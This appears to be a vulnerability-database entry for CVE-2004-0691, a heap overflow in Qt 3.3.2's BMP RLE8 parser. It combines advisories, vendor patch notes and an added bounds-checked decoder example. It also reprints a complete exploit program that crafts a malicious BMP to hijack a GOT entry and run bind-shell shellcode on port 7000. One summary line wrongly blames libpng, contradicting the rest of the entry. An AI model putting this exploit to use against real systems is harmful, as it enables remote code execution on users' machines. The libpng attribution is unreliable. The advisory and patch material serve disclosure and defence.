CVE-2004-0691
CVSS 7.5
Published: 2004-09-28 00:00:00
Revised: 2016-10-17 22:47:57

[Original text] Heap-based buffer overflow in the BMP image format parser for the QT library (qt3) before 3.3.3 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code.


[CNNVD] Qt image file buffer overflow vulnerability (CNNVD-200409-076)

        Qt is a C++ application development toolkit that includes a class library and cross-platform development tools.
        Qt contains multiple security issues; a remote attacker can exploit them by constructing malicious image files and may execute arbitrary instructions on the system with the privileges of the affected process.
        The Qt library has a heap-based buffer overflow when processing 8-bit RLE-encoded BMP files; a remote attacker can create a specially crafted BMP file and entice a user to view it, which can lead to arbitrary instruction execution.
        The same problem also exists when processing XPM, GIF and JPEG image files.
        This vulnerability is actually caused by libpng; because it was assigned a CVE number, it is listed as a separate vulnerability.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9485
Heap-based buffer overflow in the BMP image format parser for the QT library (qt3) before 3.3.3 allows remote attackers to cause a denial of...
*OVAL describes in detail how to detect this vulnerability; you can find more technical details on detecting it in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0691
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0691
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200409-076
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109295309008309&w=2
(UNKNOWN)  BUGTRAQ  20040818 CESA-2004-004: qt
http://security.gentoo.org/glsa/glsa-200408-20.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200408-20
http://sunsolve.sun.com/search/document.do?assetkey=1-66-201610-1
(UNKNOWN)  SUNALERT  201610
http://www.debian.org/security/2004/dsa-542
(UNKNOWN)  DEBIAN  DSA-542
http://www.mandriva.com/security/advisories?name=MDKSA-2004:085
(UNKNOWN)  MANDRAKE  MDKSA-2004:085
http://www.novell.com/linux/security/advisories/2004_27_qt3.html
(UNKNOWN)  SUSE  SUSE-SA:2004:027
http://www.redhat.com/support/errata/RHSA-2004-414.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:414
http://xforce.iss.net/xforce/xfdb/17040
(VENDOR_ADVISORY)  XF  qt-bmp-bo(17040)

- Vulnerability information

Qt image file buffer overflow vulnerability
High risk  Boundary condition error
2004-09-28 00:00:00 2010-01-28 00:00:00
Remote

- Advisories and patches

        Vendor patches:
        Trolltech
        ---------
        The vendor has released an upgrade to fix this security problem; please download the upgraded version, Qt 3.3.3, from the vendor's home page:

        http://www.trolltech.com/download/index.html

- Vulnerability information (408)

Qt BMP Parsing Bug Heap Overflow Exploit (EDBID:408)
linux remote
2004-08-21 Verified
0 infamous41md
N/A
/*
*  heap overflow exploit for qt bmp parsing bug
*  infamous42md AT hotpop DOT com
*
*  shouts to mitakeet, MB, and peeps @hackaholic
*
*  ok, pretty standard heap overflow here. we spill across our chunk and
*  overwrite the boundary tag for next chunk.  the only problems i had was
*  finding a miserable jump slot to overwrite.  i thought i could just
*  overwrite malloc jump slot, but umm, well i'm not sure how to get the jump
*  slot for malloc from the shared library file.  it is some sort of offset
*  from somewhere, and i'm not sure where.  using the malloc jump slot from the
*  program you're exploiting doesn't seem to work.  sorry i'm not an expert on
*  linking and loading yet, maybe after i read the 'linker loader' book next
*  semester i will be... but perhaps someone could explain this to me?  so
*  anyways, instead i hijacked QWidget::setCaption() jump slot.  and how did i
*  find that? well, it sure wasn't a 1337 way.  i dumped the GOT in gdb until i
*  found the address.  so the below address is for Qt multithreaded 3.3.2. i'm
*  sure it is different for other machines/platforms, so you'll need to do some
*  digging i'm guessing.  the program i used to test all this was qvv image
*  viewer b/c it was small and didn't take 37 hours to d/l like Konqueror would
*  of.  obviously the heap layout is going to vary greatly from program to
*  program, and depending on at what point in a given program the bmp is
*  loaded, so i can't see this being a very reliable way to exploit.  rather
*  just a POC.
*
* [n00b@localho.outernet] netstat -ant | grep 7000
* [n00b@localho.outernet] gcc -Wall haqt.c
* [n00b@localho.outernet] ./a.out 0x80be9f8 8
* [n00b@localho.outernet] ./qvv suckit.bmp
* [n00b@localho.outernet] netstat -ant | grep 7000
* tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN
* [n00b@localho.outernet] ./a.out
*         Usage: ./a.out < retaddr > [ align ]
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>

#define RETLOC 0x808cd0c    /* jump slot for QWidget::setCaption */
#define ALIGN 8
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define OUTFILE "suckit.bmp"
#define NCHUNK_BYTES 100

/*  a bitmap header structure */
#define BMP_HDR_SZ sizeof(struct bmp)
struct bmp {
   u_char  type[2];
   u_int   bfsize,
           reserved,
           offbits,    /* BMP_FILEHDR_SIZE */
           bisize,     /* 40 */
           width,      /* 8 */
           height;     /* 18 */
   u_short planes,     /* 1 */
           bitcount;   /* 8 */
   u_int   compres,    /* 1 */
           szimg,
           xppm,
           ypppm,
           clrused,    /* 1 */
           clrimportant;
} __attribute__ ((packed));

/*  a dlmalloc chunk descriptor */
#define CHUNKSZ sizeof(mchunk_t)
typedef struct _mchunk {
   size_t  prevsz;
   size_t  sz;
   long    fd;
   long    bk;
} mchunk_t;

/* call them on port 7000, mine, and needs to lose some weight */
#define SHELL_LEN (sizeof(remote)-1)
char remote[] =
"\xeb\x0a""1234567890"  /* jump */
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\xa1\x5f\x66\x6e\x69";

void make_bmp(char *buf, int len)
{
   int fd = 0;

   /* create the 3vil file */
   if( (fd = open(OUTFILE, O_RDWR|O_CREAT, 0666)) < 0)
       die("open");

   if(write(fd, buf, len) < 0)
       die("write");

   close(fd);
}

/*
 * build the BMP header, the fake dlmalloc chunk descriptor and the payload,
 * then write the whole buffer out as OUTFILE
 */
int main(int argc, char **argv)
{
   int len = 0, x = 0, align = ALIGN;
   char    buf[BS];
   u_long  retaddr;
   struct bmp   bmp;
   mchunk_t    chunk;

   /* start from a zeroed buffer so untouched bytes (e.g. the color table
      area skipped below) are deterministic rather than stack garbage */
   memset(buf, 0, sizeof(buf));

   if(argc < 2){
       fprintf(stderr, "\tUsage: %s < retaddr > [ align ]\n", argv[0]);
       return EXIT_FAILURE;
   }
   if(argc > 2){
       align = atoi(argv[2]);
       if(align < 0 || align > 15)
           die("get bent bitch");
   }
   sscanf(argv[1], "%lx", &retaddr);

   /* setup bitmap header info */
   memset(&bmp, 0, BMP_HDR_SZ);
   bmp.type[0] = 'B', bmp.type[1] = 'M';
   bmp.bfsize = 3126;
   bmp.bisize = 40;
   bmp.planes = 1;
   bmp.bitcount = 8;
   bmp.compres = 1;
   bmp.clrused = 1;
   bmp.width = 8;
   bmp.height = 18;

   /* and the chunk */
   chunk.prevsz = 224;
   chunk.sz = 0xfffffffc;
   chunk.fd = RETLOC - 12;
   chunk.bk = retaddr;

   /* and now setup the buffer */
   memcpy(buf, &bmp, BMP_HDR_SZ);
   len += BMP_HDR_SZ;

   /* to pass some checks */
   len += 4;           /* the color table */
   buf[len++] = 0;     /* to pass the if() */
   buf[len++] = 0xff;  /* overwrite len */

   /*
    * and now the fun begins:
    * first splatter the chunks, then the shellcode
    */
   len += align;
   for(x = 0; x < NCHUNK_BYTES-CHUNKSZ-1; x += CHUNKSZ)
       memcpy(buf+len+x, &chunk, CHUNKSZ);
   len += x;
   memcpy(buf+len, remote, SHELL_LEN);
   len += SHELL_LEN;

   make_bmp(buf, len);
   return 0;
}


// milw0rm.com [2004-08-21]

- Vulnerability information (F34094)

Chris Evans Security Advisory 2004.4 (PacketStormID:F34094)
2004-08-20 00:00:00
Chris Evans  scary.beasts.org
advisory,overflow
CVE-2004-0691

qt version 3.3.2 has a heap overflow in its BMP parser.

CESA-2004-004 - rev 3

http://scary.beasts.org/security/CESA-2004-004.txt

qt 3.3.2 BMP parser heap overflow error
=======================================

Programs:          qt, and any programs which use qt to decode BMP files. For
                   example, KDE (including konqueror).
Severity:          Possible compromise of account used to browse malicious
                   BMP files.
CAN identifier(s): CAN-2004-0691

This advisory notes a code flaw discovered by inspection of the qt code.
The specific version of qt discussed is v3.3.2.
qt-3.3.3 has already been released and it contains a fix for this issue.

Flaw 1. Heap-based overflow in read_dib (qimage.cpp).

The handling of 8-bit RLE encoded BMP files is faulty. Interestingly, the 4-bit
RLE encoding handling seems to have the required safety checks.
a) User supplied length used to read into heap buffer without adequate bounds
checking:
     default:    // absolute mode
          if ( d->readBlock( (char *)p, b ) != b )
b) User supplied length used to memset() a piece of heap buffer without
adequate bounds checking:
    } else {      // encoded mode
        memset( p, d->getch(), b ); // repeat pixel
c) User supplied delta pixel co-ordinates used without range checking:
      case 2:     // delta (jump)
          x += d->getch();
          y += d->getch();
          p = line[h-y-1] + x;

Demo BMP: http://scary.beasts.org/misc/bad.bmp (flaw 1a).


CESA-2004-004 - rev 3
Chris Evans
chris@scary.beasts.org

[Advertisement: I am interested in moving into a security related field
 full-time. E-mail me to discuss.]
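As an added example (not Qt's code and not part of the advisory above), here is a minimal BI_RLE8 decoder in C that carries the three checks Evans lists: the literal run (flaw 1a), the repeat run (flaw 1b) and the delta jump (flaw 1c) are each validated against the remaining room in the current scanline before any byte is written, and the stream reader refuses to read past the end of its input. The `rle_stream` type, the negative return codes and the sample streams are constructed for this illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Bounded byte stream; getch() returns -1 at end of input instead of
 * reading past it (constructed helper standing in for Qt's QIODevice). */
typedef struct { const uint8_t *data; size_t len; size_t pos; } rle_stream;

static int getch(rle_stream *s)
{
    if (s->pos >= s->len)
        return -1;
    return s->data[s->pos++];
}

/* Decode a BI_RLE8 pixel stream into out, which must hold w*h bytes.
 * Row y of out is the y-th scanline in stream order (BMP stores scanlines
 * bottom-up; Qt's read_dib() indexes line[h-y-1] for the same reason).
 * Returns 0 on success or a negative code naming the rejected construct. */
int decode_rle8(const uint8_t *data, size_t len, int w, int h, uint8_t *out)
{
    rle_stream s = { data, len, 0 };
    int x = 0, y = 0;

    if (w <= 0 || h <= 0)
        return -1;
    memset(out, 0, (size_t)w * (size_t)h);

    for (;;) {
        int b = getch(&s);
        if (b < 0)
            return -2;                      /* truncated stream */

        if (b != 0) {                       /* encoded mode: repeat px b times (1b) */
            int px = getch(&s);
            if (px < 0)
                return -2;
            if (y >= h || b > w - x)
                return -3;                  /* run would leave the scanline */
            memset(out + (size_t)y * (size_t)w + (size_t)x, px, (size_t)b);
            x += b;
            continue;
        }

        int c = getch(&s);
        if (c < 0)
            return -2;
        switch (c) {
        case 0:                             /* end of line */
            x = 0;
            y++;
            break;
        case 1:                             /* end of bitmap */
            return 0;
        case 2: {                           /* delta jump (1c) */
            int dx = getch(&s), dy = getch(&s);
            if (dx < 0 || dy < 0)
                return -2;
            if (dx > w - x || dy > h - y)
                return -4;                  /* jump lands outside the image */
            x += dx;
            y += dy;
            break;
        }
        default: {                          /* absolute mode: c literal pixels (1a) */
            if (y >= h || c > w - x)
                return -5;                  /* literal run would leave the scanline */
            for (int i = 0; i < c; i++) {
                int px = getch(&s);
                if (px < 0)
                    return -2;
                out[(size_t)y * (size_t)w + (size_t)x + (size_t)i] = (uint8_t)px;
            }
            x += c;
            if ((c & 1) && getch(&s) < 0)   /* literal runs are padded to 16 bits */
                return -2;
            break;
        }
        }
    }
}

/* Constructed sample streams for a 4x2 image. */
static const uint8_t kGood[] = {
    0x04, 0xaa,                          /* repeat 0xaa four times */
    0x00, 0x00,                          /* end of line */
    0x00, 0x03, 0x01, 0x02, 0x03, 0x00,  /* three literal pixels + pad byte */
    0x00, 0x01                           /* end of bitmap */
};
static const uint8_t kBadRepeat[]   = { 0xff, 0xaa };             /* flaw 1b */
static const uint8_t kBadAbsolute[] = { 0x00, 0xff, 0x41 };       /* flaw 1a */
static const uint8_t kBadDelta[]    = { 0x00, 0x02, 0x10, 0x00 }; /* flaw 1c */

/* Decode one sample into a scratch 4x2 buffer and report the result code. */
int check_sample(const uint8_t *data, size_t len)
{
    uint8_t out[8];
    return decode_rle8(data, len, 4, 2, out);
}

int main(void)
{
    printf("well-formed stream:   rc=%d\n", check_sample(kGood, sizeof kGood));
    printf("oversized repeat run: rc=%d\n", check_sample(kBadRepeat, sizeof kBadRepeat));
    printf("oversized literal:    rc=%d\n", check_sample(kBadAbsolute, sizeof kBadAbsolute));
    printf("out-of-range delta:   rc=%d\n", check_sample(kBadDelta, sizeof kBadDelta));
    return 0;
}
```

Each of the three malformed streams is rejected before the first out-of-bounds write; the same inputs against a decoder that trusts the run length or the delta, as the advisory describes for qt 3.3.2, would write past the end of the scanline buffer.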

- Vulnerability information

9026
Qt qimage.cpp read_dib Function BMP Handling Overflow
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

A remote overflow exists in Trolltech Qt. The read_dib() function fails to check user-supplied data, resulting in a buffer overflow in at least three blocks of code. With a specially crafted request, an attacker can execute arbitrary code with the privileges of the current user, resulting in a loss of confidentiality, integrity, and/or availability.

- Timeline

2004-08-18 2004-07-23
2004-08-21 Unknown

- Solution

Upgrade to version 3.3.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

Multiple Qt Image Handling Heap Overflow Vulnerabilities
Boundary Condition Error 10977
Yes No
2004-08-19 12:00:00 2009-07-12 06:17:00
Discovery of these issues is credited to Chris Evans.

- Affected program versions

Trolltech Qt 3.3.2
Trolltech Qt 3.3.1
Trolltech Qt 3.3.0
Trolltech Qt 3.2.3
+ Conectiva Linux 10.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
Trolltech Qt 3.2.1
Trolltech Qt 3.1.2
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
Trolltech Qt 3.1.1
+ Conectiva Linux 9.0
Trolltech Qt 3.1
Trolltech Qt 3.0.5
Trolltech Qt 3.0.3
Trolltech Qt 3.0
Trolltech Qt 2.3.1
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
Sun Java Desktop System (JDS) 2.0
Sun Java Desktop System (JDS) 2003
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
RedHat Linux 9.0 i386
RedHat Linux 7.3 i686
RedHat Linux 7.3 i386
RedHat Linux 7.3
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Gentoo Linux 1.4
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya MN100
Avaya Intuity LX
Trolltech Qt 3.3.3

- Unaffected program versions

Trolltech Qt 3.3.3

- Vulnerability discussion

Multiple heap overflows have been reported to exist in the Qt QImage library. These issues may be triggered when handling malformed images of various types, potentially causing a denial of service in applications that use the library to render images. Remote code execution is also possible.

- Exploit

A proof-of-concept exploit has been provided by <infamous41md@hotpop.com>:

- Solution

SuSE has released advisory SUSE-SA:2004:035 mainly to address the vulnerability described in BID 11281. However, in the addendum of this advisory, it is reported that fixes for the issues described in this BID for the Opera browser are now available on the SuSE update FTP server for download. Customers are advised to see the referenced advisory for further information regarding obtaining and applying appropriate updates.

Red Hat has released advisory RHSA-2004:478-13 and fixes to address these and other issues on Red Hat Linux Enterprise platforms. Customers who are affected by these issues are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Mandrake has released advisory MDKSA-2004:085 to address this issue. Please see the attached advisory for further details on obtaining and applying fixes.

These issues have been addressed in Qt 3.3.3. It should be noted that applications that are statically compiled with the affected library will need to be recompiled against an updated version.

SUSE has released an advisory (SUSE-SA:2004:027) to address these issues. Please see the referenced advisory for more information.

RedHat has released an advisory (RHSA-2004:414-19) along with fixes to address these issues. Please see the referenced advisory for further information.

Gentoo Linux has released an advisory (GLSA 200408-20) along with fixes to address these issues. Please see the referenced advisory for further information. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge sync
emerge -pv ">=x11-libs/qt-3.3.3"
emerge ">=x11-libs/qt-3.3.3"

RedHat has released two advisories (FEDORA-2004-270, FEDORA-2004-271) to address these issues in Fedora Core 1 and Fedora Core 2. Please see the referenced advisories for more information.

Slackware has released an advisory (SSA:2004-236-01) to address these issues. Please see the referenced advisory for more information.

Debian has released an advisory (DSA 542-1) to address these issues. Please see the referenced advisory for more information.

Turbolinux has released an advisory (TLSA-2004-21) to address these issues. Please see the referenced advisory for more information.

Sun has released Sun Alert ID:57637 dealing with these issues. Sun advises users to update the affected packages by selecting Online Update from the launch bar:

Launch >> Applications >> System Tools >> Online Update

For more information please see the referenced Sun web advisory.

Conectiva Linux has released an advisory (CLA-2004:866) along with fixes dealing with this issue. Please see the referenced advisory for more information.

Red Hat has released an advisory (RHSA-2004:479-05) to address these and other issues in Red Hat Enterprise Linux. Please see the referenced advisory for more information.

Avaya has released an advisory indicating vulnerable packages. Avaya has suggested that upgrades will be available to address these issues. Please see the advisory at the following location for more information:

http://support.avaya.com/japple/css/japple?temp.groupID=128450&temp.selectedFamily=128451&temp.selectedProduct=154235&temp.selectedBucket=126655&temp.feedbackState=askForFeedback&temp.documentID=203389&PAGE=avaya.css.CSSLvl1Detail&executeTransaction=avaya.css.UsageUpdate()

Fedora Legacy has released advisory FLSA-2005:2314 dealing with this and other issues for the Fedora Core 1 and RedHat Linux packages. Please see the referenced advisory for more information.

The Fedora Legacy project has released advisory FLSA:152763 to address this issue in RedHat Linux 7.3, and 9. Please see the referenced advisory for further information.
